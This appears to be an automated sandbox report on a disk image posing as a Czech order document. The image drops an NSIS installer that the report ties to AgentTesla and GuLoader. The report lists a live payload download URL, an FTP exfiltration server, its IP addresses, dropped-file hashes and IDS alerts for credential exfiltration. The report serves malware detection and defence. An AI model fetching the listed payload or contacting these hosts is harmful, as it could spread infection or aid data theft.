\Device\CdRom1\Objedn vka_20248481119000903.exe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin	0%	Avira URL Cloud	safe
http://ftp.carbognin.it	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ftp.carbognin.it	86.107.36.93	true	true		unknown
akonnyuszerkezet.hu	185.33.55.26	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	false		high
https://sectigo.com/CPS0	Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	Objedn vka_20248481119000903.exe, 00000005.00000002.1996451858.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Objedn vka_20248481119000903.exe, 00000005.00000000.1682895809.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Objedn vka_20248481119000903.exe, 00000009.00000002.2916375841.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	false		high
http://ocsp.sectigo.com0	Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Objedn vka_20248481119000903.exe, 00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	false		high
http://ftp.carbognin.it	Objedn vka_20248481119000903.exe, 00000009.00000002.2939013791.0000000034E5C000.00000004.00000800.00020000.00000000.sdmp, Objedn vka_20248481119000903.exe, 00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.33.55.26	akonnyuszerkezet.hu	Hungary		47381	SERVERGARDEN-ASServergardenKftHU	false
86.107.36.93	ftp.carbognin.it	Romania		6910	DIALTELECOMRO	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566525
Start date and time:	2024-12-02 11:34:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Objedn#U00e1vka_20248481119000903.img renamed because original name is a hash value
Original Sample Name:	Objednvka_20248481119000903.img
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winIMG@7/15@2/2

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, vhdmp.sys, WMIADAP.exe, SIHClient.exe, conhost.exe, fsdepends.sys
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Objedn#U00e1vka_20248481119000903.img

Simulations

Behavior and APIs

Time	Type	Description
05:35:22	API Interceptor	33x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.33.55.26	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	romstal-hungary.hu//MIzSja40.bin
86.107.36.93	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Rendeles_110078670008860000002.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Rendeles_1100786700088673955430.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	wzjEaheCBP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	4MQ9rTK7AV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Doc22378670008869955430311.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	doc222378670008869955430341.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ftp.carbognin.it	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse	86.107.36.93
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	Rendeles_110078670008860000002.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	Rendeles_1100786700088673955430.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	wzjEaheCBP.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	4MQ9rTK7AV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	Doc22378670008869955430311.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93
	doc222378670008869955430341.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	86.107.36.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIALTELECOMRO	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	188.240.230.166
	mpsl.elf	Get hash	malicious	Mirai	Browse	93.114.246.9
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe	Get hash	malicious	DBatLoader, FormBook	Browse	92.114.2.230
	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse	86.107.36.93
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd	Get hash	malicious	DBatLoader, FormBook	Browse	92.114.2.230
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	splppc.elf	Get hash	malicious	Unknown	Browse	188.209.98.177
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	93.114.114.57
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	46.102.13.204
	SecuriteInfo.com.Win32.Sector.30.15961.3704.exe	Get hash	malicious	Sality	Browse	89.41.154.115
SERVERGARDEN-ASServergardenKftHU	mips.elf	Get hash	malicious	Mirai	Browse	185.51.81.237
	FLITTIGL.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.33.55.26
	LPO 92558 & 92669.exe	Get hash	malicious	FormBook	Browse	185.33.52.20
	Wezwanie policji 0001308_24.docx.exe	Get hash	malicious	AgentTesla	Browse	185.33.54.1
	Express One #U00e9rtes#U00edt#U01511.exe	Get hash	malicious	AgentTesla	Browse	80.77.122.144
	LisectAVT_2403002A_41.exe	Get hash	malicious	GuLoader	Browse	185.33.54.3
	megerosites.cmd	Get hash	malicious	DBatLoader, Lokibot	Browse	185.33.54.13
	Swift copy.exe	Get hash	malicious	FormBook	Browse	185.33.52.20
	Uplata_391.cmd	Get hash	malicious	DBatLoader	Browse	185.33.54.13
	D#U00dcZELT#U0130LM#U0130#U015e S#U00d6ZLE#U015eME-pdf.exe	Get hash	malicious	GuLoader	Browse	185.33.54.3

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsj41C4.tmp\System.dll	ZAMOWIEN.EXE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	TeamViewer_Setup.exe	Get hash	malicious	Unknown	Browse
	2CkzetcMde.exe	Get hash	malicious	GuLoader	Browse
	xtiVY6XbqY.exe	Get hash	malicious	GuLoader	Browse
	2CkzetcMde.exe	Get hash	malicious	GuLoader	Browse
	xtiVY6XbqY.exe	Get hash	malicious	GuLoader	Browse
	rPurchaseOrderPO05232024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	rPurchaseOrderPO05232024.exe	Get hash	malicious	GuLoader	Browse
	TeamViewer_Host_Setup.exe	Get hash	malicious	Unknown	Browse
	TeamViewer_Host_Setup.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2520
Entropy (8bit):	5.3932612599582725
Encrypted:	false
SSDEEP:	48:tnWSU4y4RFymFoUeW+gZ9tlNWR83tVAOVbBQLXjvxs8MXgeRUXNcWszKwhjt:tnLHyIFvKLgZXW8r9NBQLXjZs8EgiDWK
MD5:	AC931D7549F24A98320989CAFAE44F54
SHA1:	FEFE8A35DEAE3E9A7923245607219D561E6D1716
SHA-256:	B9B924A409378251665673ACD4C56DC5CFDE3147E828EB77EF95B6EEC2179D07
SHA-512:	CA6317B8B9CAEC279DA195A8C86779491C3E789456C9AD6A482CE4E046B5038705B61C20F65F2C5BEE07963B4E587A99FF37EC048ABF7C7E711CB835395D4597
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ul02a4h.ym1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d1fwnyw.mys.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lgqcbgh.glu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksi34dec.5l4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsj41C4.tmp\System.dll

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.6557532861400945
Encrypted:	false
SSDEEP:	192:eK24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlASl:u8QIl975eXqlWBrz7YLOlA
MD5:	0FF2D70CFDC8095EA99CA2DABBEC3CD7
SHA1:	10C51496D37CECD0E8A503A5A9BB2329D9B38116
SHA-256:	982C5FB7ADA7D8C9BC3E419D1C35DA6F05BC5DD845940C179AF3A33D00A36A8B
SHA-512:	CB5FC0B3194F469B833C2C9ABF493FCEC5251E8609881B7F5E095B9BD09ED468168E95DDA0BA415A7D8D6B7F0DEE735467C0ED8E52B223EB5359986891BA6E2E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ZAMOWIEN.EXE.exe, Detection: malicious, Browse Filename: TeamViewer_Setup.exe, Detection: malicious, Browse Filename: 2CkzetcMde.exe, Detection: malicious, Browse Filename: xtiVY6XbqY.exe, Detection: malicious, Browse Filename: 2CkzetcMde.exe, Detection: malicious, Browse Filename: xtiVY6XbqY.exe, Detection: malicious, Browse Filename: rPurchaseOrderPO05232024.exe, Detection: malicious, Browse Filename: rPurchaseOrderPO05232024.exe, Detection: malicious, Browse Filename: TeamViewer_Host_Setup.exe, Detection: malicious, Browse Filename: TeamViewer_Host_Setup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....z.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\tmp.log

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	325
Entropy (8bit):	4.605093863631794
Encrypted:	false
SSDEEP:	6:wvMYFVEh1IMBdZ1ErQNwvqHK/NarHg2a9yoEdU06X//F:wvMYFVEh15snd/Narg2a9yA06XV
MD5:	4FC139BB7FD40D07D014719905BBCF29
SHA1:	4B6D70E99172EFB17A536816C9123B881AD8B5F7
SHA-256:	9E152AD5AD2710D9FB793B69C178AAABC9D532B6870BEF396DC11AC845A3765E
SHA-512:	1880F7F88DAD75AE5A6557A057015F49B8499150DE89A28F5AC8B7B3A116AB23E3328627DCB674606EC0DA89C854EBB60CA30D7D9DF9569C7FE82B832C686A58
Malicious:	false
Preview:	....Attached : True..BlockSize : 0..DevicePath : \\.\CDROM1..FileSize : 1572864..ImagePath : C:\Users\user\Desktop\Objedn#U00e1vka_20248481119000903.img..LogicalSectorSize : 2048..Number : 1..Size : 1572864..StorageType : 1..PSComputerName : ........

C:\Users\user\slouchingly\bigbloom\forkvakl\Dekomponeres.Pig

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	data
Category:	dropped
Size (bytes):	450378
Entropy (8bit):	6.984124356008776
Encrypted:	false
SSDEEP:	12288:kmZpvAus5Uv75v31PZjMtMd6zHWsyH9kT:Hjv60VP1PZjMc6T/
MD5:	D197341F80811D345D0729CB0C367AFC
SHA1:	06800A1FEF4500257656ED2F456DCDA91C771023
SHA-256:	7DC908E0732D9929C06C6518F505C27822BA13AD398149B1165B222E27C7D3DD
SHA-512:	1681965F13AB2D6D29F9596392957402F07DDF31ABE3D4E4F055DCD9A482803B5F5502AC87976901D9F3EA21C499DC47B4ED569E6F20AA3B45E58BBF718EC800
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\slouchingly\bigbloom\forkvakl\Gucki197.rev

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	data
Category:	dropped
Size (bytes):	400450
Entropy (8bit):	1.248707194590998
Encrypted:	false
SSDEEP:	768:8Bbz4BxcTdMmSUh90wLvydX7O7u1q7vKhk28IKe5IHo3efZIQEfXJ0GphG6HQp69:q0TLylBx9AHHQf/7aWZTaqG/XkAku
MD5:	DE23F93FE5307EBD2882DD6E94D9B889
SHA1:	E9FC2885BCC8E9818FD261D08B2CFA47ED2A5FBA
SHA-256:	9D19A6317F91947B0B99630805FCDFEA004490D433F2C2B3E7E77750B00E5F91
SHA-512:	588F55A1B18450E36E6213961F3EC0F0DA4A9D22BAC508E0F635853323840E9CA30951A32B21D41002FEF29CBD9FD3755C02EA9F101488339033FB721A67D967
Malicious:	false
Preview:	.................:.................7.........r...........o.............................u.................8........................f..........................................P...................+.. ..................................g...................................................U.................................x...............................................................................K............................a....................................................................T...............m.............Z.................$...].........................................................................................................................................................................6..............;.....................................................................k......................g.............M.=.....................G...n.....................................................&...................,......................................g...........A.......

C:\Users\user\slouchingly\bigbloom\forkvakl\Nskebarn23.bes

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	data
Category:	dropped
Size (bytes):	351962
Entropy (8bit):	1.2579220366020167
Encrypted:	false
SSDEEP:	768:sBeE6smGvQdN86fCzFo/30XUgjJ0Mqim4RgAbUQzniiRghb9CmyFGIoqmg918OMU:MtuR0Yu7ivu4XKhAJUVWE6au
MD5:	DF506635717E0CC22E0C2005C5581B9E
SHA1:	56BB3598D19E304A8A4B490BC09F8B2EB80DC716
SHA-256:	8210EFAF7FBD9602F820A58FA3332F251D93D16EB3385539BE59BE310D7358D2
SHA-512:	2A3AD4FD8FD8C0D07F249E6F886A48E2304E908264761A2D020548752FF274FFC92B862EB911F02CC7E97C44AB0C1C9097C772CE67FFDD5FFEB8F0BA87853564
Malicious:	false
Preview:	...................................b.........V..............................................r.....w..............................^....\...............................;.e...$.............................C...................................................................s.....c.............................A.........I................U<.........................................................................`..........................@..............................................................................................n............................................C..............f.........................T...............................................C................V..........................b.....#......>..................Q.........b....y...............................................................&............................................................................n.............%............Z..................................<..................................[.....

C:\Users\user\slouchingly\bigbloom\forkvakl\kargoerne.mas

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	data
Category:	dropped
Size (bytes):	395805
Entropy (8bit):	1.252290904287034
Encrypted:	false
SSDEEP:	768:LD7DoMuhwQnz1J6vU99w3a1IKrFC0d2U01xfwFmGWc54ajEkqKTCW/wUCpSPjAuK:LIw0t/C1vuWhQWXiH95AJijTZFw
MD5:	85972D81F1A3BD37ADFD250FE67B2432
SHA1:	FA2441AB02AD3FB5FC8BB711689BE4229EA884CE
SHA-256:	5372037577E6C38EBFE90D38305A237DEA052D7EF16A253E820624A4302FCB51
SHA-512:	C0EC5861FB9F27169AFD3DAA00CDED4784C11799B37FF2F58E5F443AE5718FBC9CED38C281CACC1305ACADE1A36925F8C5070EB31FDE553818A60F0D44E3FDB5
Malicious:	false
Preview:	..........................f......................_...............................$..........}..............'..............................................................,...........................................<9................~...............X.................................z............E........................5.....z2.x........................................Q........8.....................`................{.............................J.................................2............................7..mo.1........................\.............................................................................O.........8...................c...................................M.h..........."....................\...........}.......................................................................................................0...................#...................&.,.w.............................w.......".............................;.....E...........z........................./......

C:\Users\user\slouchingly\bigbloom\forkvakl\paralysernes.dis

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	340033
Entropy (8bit):	1.2563431715436053
Encrypted:	false
SSDEEP:	768:M89WVAuwGsZsyzNvzr/3yfRfAlhEvxu8T3C4rnYjU55Tg4JBKIDh2FNxMFozUogx:M5xKniA7Iz7OqBI2zWewUGQhZb1
MD5:	CCC70DCD9D5F8D5BF1A6CACFEBDC854E
SHA1:	C24A3DBA478BB6BAA7D4CA70BAF3EF152021450A
SHA-256:	CCD710DEBD851EED37F51886924A544040993F21B743CDEDD24C6FEA4BC57C62
SHA-512:	3A8155CA7F7F48AD3F0A7A77AE0075D371B1A281670531B91BB0BF42E7B4EF8725206B9872BBBF4211EB8B6261F52F1332D7421AD36913F54BD7841E6A3F09AA
Malicious:	false
Preview:	.........}......................................................Z............................................................}...............................5..........................................................................................................................................0.......N...........................................................................!........................[..............................................................................................................Q........*......_......!....................@.....p...[................................(....................^..:......K............6...................L.............a................................`.......C.....................\..................B.N................z..................x..............................>......................................................./...................................................................2..........................................

C:\Users\user\slouchingly\bigbloom\forkvakl\skadegreren.txt

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	503
Entropy (8bit):	4.155338028293255
Encrypted:	false
SSDEEP:	12:dpQCe39LqW9Jg0zRZELoPtYq7oWynAfO6dp:dypTv9YEchN+p
MD5:	AD7AE25E68F9D7CB8902D5A114AC3DAF
SHA1:	1EA182BF15051F4FA2BFA53E7771FD616A00D0CD
SHA-256:	0A64CF29DA53848A65687EDBD8E60C55A43CB06D4945C94BD6FA5CFE1CA589E5
SHA-512:	774A7B312A26E4F699C43C9267228D934394F13576D366BD0C3722B75DDDB4565388D1B98BF56495AED05CFCFCAAF4D27EF186190675A7B0E78941974C005C15
Malicious:	false
Preview:	stoppesteder rockies untrusted pousserer ironically proportionably,arkipelagernes nonperpendicularity opgavefordelingernes proboscises fribilletternes tilsatsene efterstrbelserne diligent guttifer smdeviserne spotprisers..afskydningers formose snerperiet,driblingerne informationsmaengder giddier tangnaal coloradobillernes enostosis cogie.dkkeserviettens hyalophagia cunningly dentinitis outmarches malerisamlingen skolebog snabelsko..dataselskaberne endarterium forudbestemmendes snedkereres burdened.

C:\Users\user\slouchingly\bigbloom\forkvakl\sprtter.com

Download File

Process:	\Device\CdRom1\Objedn vka_20248481119000903.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 9007199254740992.000000, slope 4222124650659840.000000
Category:	dropped
Size (bytes):	325405
Entropy (8bit):	1.246396968978626
Encrypted:	false
SSDEEP:	1536:ZlQllV6CDA7MPbmnsU16bMeUyDSKeVN/ABuS:SbwMzmYT1e4d
MD5:	2065053F8690386ADB8CD35F9064C64C
SHA1:	EC62B55F8178B86C350E7B47490046F9B2FB1574
SHA-256:	B74077F003FE05F1147D8C96A7DEFFE44C07CBCFC4F35CF9F97EEC69F3E1D389
SHA-512:	91E667B943E8E7CAB1BB0441BF27170C1CEA30253F2C3EA63C9EE305D262DF3A7EB1EC1C115852995E6C6A6E01B3DEC7B57A3418086471739A71639A7D5A0345
Malicious:	false
Preview:	...............................................................................P.........&..................h....................................................................Y...................................................m............................m.............q...................................#.............l............................................d.........y...........................................................................z....P................Z...H....E..........p......v.........................=.............5................+.......................K............U....u.....D........................<...................K]..X......................<.........>..................................................8................y.................................m........................................................................................................................%........................%.............Y.t..............................................

\Device\CdRom1\Objedn vka_20248481119000903.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1009888
Entropy (8bit):	7.614077813916298
Encrypted:	false
SSDEEP:	24576:SvCFfkjgVitNv7LtnP0deH7ZONDejqaBjiMD95w78:1FfkjvlnYeHqej9iMD9/
MD5:	FFC86DFE93F81BCE26A2B4D2D818B167
SHA1:	0FFF0A167C2BE3C66E3DBC9573482B0ED77BFA48
SHA-256:	F10D9EA2A6E79BD7F191737A8C45E7FA3A8C72C2DC3CBE160CCA365A42FFAC7B
SHA-512:	E359DA6BC5282126BB91A85D80C5FFE61D3FDF56C6EB1B580938070B8ADCF8B6100CC86E94237A4D628BDB82CB8474B5E11E4749DF5C5993D89BD28A856F6253
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P.._...P...P..OP.._...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@..................................\....@..........................................................F..."...........................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	UDF filesystem data (version 1.5) 'DESTINY'
Entropy (8bit):	5.576641722469149
TrID:	ImgBurn Image (2054048/1) 33.29% ImgBurn Image (2052548/1) 33.26% null bytes (2050048/1) 33.22% Photoshop Action (5010/6) 0.08% Lotus 123 Worksheet (generic) (2007/4) 0.03%
File name:	Objedn#U00e1vka_20248481119000903.img
File size:	1'572'864 bytes
MD5:	8b2f7394817f048cb466ad9046458f3a
SHA1:	af12cb22f90f8ba4b84b7c8a2d691f66a800fc0f
SHA256:	f65bcb980c5bf774ba123d8cdede4a455e766c0b1935f3e0c892608fdc6f19b0
SHA512:	cfb17c7e64b20168b2ef7725ce287028795f32290be9428377c1e23e9cf4ba94050f7aed0113a35da9567a8841d6008e7b25f34b235012618f051446adac281d
SSDEEP:	24576:pvCFfkjgVitNv7LtnP0deH7ZONDejqaBjiMD95w7:sFfkjvlnYeHqej9iMD9
TLSH:	9D7512803698DF83D79C567049BCDBB646B46FEC6C20820677ECEE0E7F36B55581428A
File Content Preview:	...............................................................................................................................................................................................................................................................

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T11:36:11.831801+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	185.33.55.26	80	TCP
2024-12-02T11:36:18.961506+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49737	86.107.36.93	21	TCP
2024-12-02T11:36:20.106119+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49738	86.107.36.93	35334	TCP
2024-12-02T11:36:20.226620+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49738	86.107.36.93	35334	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 11:36:10.423219919 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:10.543152094 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:10.543250084 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:10.543442011 CET	49736	80	192.168.2.4	185.33.55.26
Dec 2, 2024 11:36:10.663341045 CET	80	49736	185.33.55.26	192.168.2.4
Dec 2, 2024 11:36:11.831723928 CET	80	49736	185.33.55.26	192.168.2.4
